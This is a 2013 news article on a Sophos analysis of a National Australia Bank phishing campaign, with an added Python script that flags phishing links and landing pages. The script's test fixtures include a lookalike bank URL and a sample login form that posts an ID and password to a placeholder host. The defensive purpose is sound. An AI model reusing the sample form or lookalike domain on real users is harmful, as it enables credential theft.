Security experts from Sophos detail this particular campaign

Jan 28, 2013 22:01 GMT  ·  By

Security experts from Sophos have published an article to detail the anatomy of a phishing scam. As an example, they provide a National Australia Bank (NAB) phishing email that has been seen in several inboxes over the past few days.

Recipients of the emails, entitled “National Australia Bank – 1 NEW Message,” are urged to click a link and log in to their account in order to read their “security messages.”

However, those who click on the link are not taken to the legitimate NAB website, but to a compromised Chinese government website that redirects them to a malicious webpage hosted on the hijacked site of a Colombian university.

Here, they’re asked to provide their NAB IDs and passwords. Once submitted, the data is sent via a POST request to yet another compromised website, this time the site of a US student vacation business.

Then, victims are asked to provide other personal and financial information – including name, date of birth, and payment card details – on a second phony NAB website.

The submitted information is sent to the same student vacation website, after which the victim is finally redirected to the legitimate NAB domain.

Experts advise users to treat legitimate-looking emails that contain links with suspicion. NAB, for instance, never includes links in genuine notifications, precisely so that customers can tell them apart from fakes.

Furthermore, if the website you’re taken to is hosted on a domain other than nab.com.au, you’re likely dealing with a phishing scheme. Check the actual domain of the address, not merely whether “nab.com.au” appears somewhere in it: phishers routinely put the bank’s name in a subdomain or in the path of a site they control.

Finally, reputable companies always use HTTPS connections when they ask customers to submit sensitive information, so a login or payment page served over plain HTTP is a red flag. The reverse does not hold: a page served over HTTPS is only encrypted in transit, not thereby genuine.
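The three pieces of advice above, turned into code. This is an added example, not a script from Sophos or NAB: it uses only the Python standard library, and the email text, page URL, hostnames and HTML it checks are constructed for illustration rather than taken from the campaign. It flags links in a bank notification, links whose host is not actually under nab.com.au, non-HTTPS links, and a login form whose action posts the credentials to a different host than the page itself, which is the pattern described above.

```python
"""Heuristic checks for a bank phishing email and its landing page (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

LEGIT_DOMAIN = "nab.com.au"
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)


def is_legit_host(host):
    """True only if host is nab.com.au itself or a subdomain of it.

    A substring test would accept 'nab.com.au.example' or 'nab.com.au-login.example',
    so the comparison is made on label boundaries.
    """
    host = (host or "").lower().rstrip(".")
    return host == LEGIT_DOMAIN or host.endswith("." + LEGIT_DOMAIN)


def extract_links(email_body):
    """Pull every http(s) URL out of a plain-text email body."""
    return URL_RE.findall(email_body)


def assess_link(url):
    """Return the findings for one URL taken from an email (empty list = nothing odd)."""
    findings = []
    parsed = urlparse(url)
    if not is_legit_host(parsed.hostname):
        findings.append(f"host {parsed.hostname!r} is not under {LEGIT_DOMAIN}")
    if parsed.scheme.lower() != "https":
        findings.append("link is not HTTPS")
    return findings


def assess_email(email_body):
    """Apply the advice that a genuine NAB notification carries no links at all.

    Returns a dict: '__email__' -> overall finding, each URL -> its own findings.
    """
    findings = {}
    links = extract_links(email_body)
    if links:
        findings["__email__"] = [f"email contains {len(links)} link(s); genuine NAB notifications contain none"]
    for url in links:
        per_link = assess_link(url)
        if per_link:
            findings[url] = per_link
    return findings


class FormActionParser(HTMLParser):
    """Collect the action attribute of every <form> on a page."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "form":
            # attrs is a list of (name, value); value can be None for a bare attribute
            self.actions.append(dict(attrs).get("action") or "")


def assess_landing_page(page_url, html):
    """Flag a login page on the wrong host and forms that POST to a third host."""
    findings = []
    page_host = (urlparse(page_url).hostname or "").lower()
    if not is_legit_host(page_host):
        findings.append(f"page host {page_host!r} is not under {LEGIT_DOMAIN}")
    parser = FormActionParser()
    parser.feed(html)
    for action in parser.actions:
        target = urlparse(action)
        if target.hostname and target.hostname.lower() != page_host:
            findings.append(f"form posts to {target.hostname!r}, a different host than the page")
        if target.scheme and target.scheme.lower() != "https":
            findings.append(f"form posts over {target.scheme}, not HTTPS")
    return findings


# Constructed sample email body; the hostname is invented, not the real campaign's.
SAMPLE_EMAIL = """Subject: National Australia Bank - 1 NEW Message
You have 1 new security message. Log in to read it:
http://www.nab.com.au.secure-login.example/ib/index.php
"""

# Constructed landing page: a login form on one invented compromised host that
# posts the credentials to a second invented host, as in the campaign described above.
SAMPLE_PAGE_URL = "http://compromised-university.example/~user/nab/login.html"
SAMPLE_PAGE_HTML = """<html><body>
<form method="POST" action="http://vacation-site.example/images/post.php">
  NAB ID <input name="id"> Password <input type="password" name="pw">
</form></body></html>"""

if __name__ == "__main__":
    for key, value in assess_email(SAMPLE_EMAIL).items():
        print(key, value)
    for finding in assess_landing_page(SAMPLE_PAGE_URL, SAMPLE_PAGE_HTML):
        print(finding)
```

The host check compares on label boundaries rather than with a substring test, because the lookalike in the sample, `www.nab.com.au.secure-login.example`, contains the bank’s domain verbatim and would pass a naive `"nab.com.au" in url` check. The form check models the second stage of the scam: even a page that looked right would still be caught if its form’s action pointed at some other host.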

This particular NAB phishing scam is not new, but it has been sent to numerous users over the past few days. NAB is aware of these types of scams and has published a scam advisory for its customers.